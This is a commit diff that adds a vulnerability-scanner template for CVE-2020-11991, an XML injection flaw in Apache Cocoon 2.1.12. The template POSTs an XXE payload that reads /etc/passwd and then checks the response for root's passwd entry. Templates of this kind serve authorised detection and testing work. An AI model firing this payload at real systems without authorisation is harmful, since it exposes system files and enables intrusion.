Create CVE-2020-11991.yaml
parent
adb9bcfd0c
commit
8e8d7af37b
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2020-11991
|
||||
|
||||
info:
|
||||
name: Apache Cocoon 2.1.12 XML Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11991
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/v2/api/product/manger/getInfo"
|
||||
# - "{{BaseURL}}/v2/api/product/manger/getinfo"
|
||||
headers:
|
||||
Content-type: "text/xml"
|
||||
body: |
|
||||
<!--?xml version="1.0" ?-->
|
||||
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
|
||||
<userInfo>
|
||||
<firstName>John</firstName>
|
||||
<lastName>&ent;</lastName>
|
||||
</userInfo>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue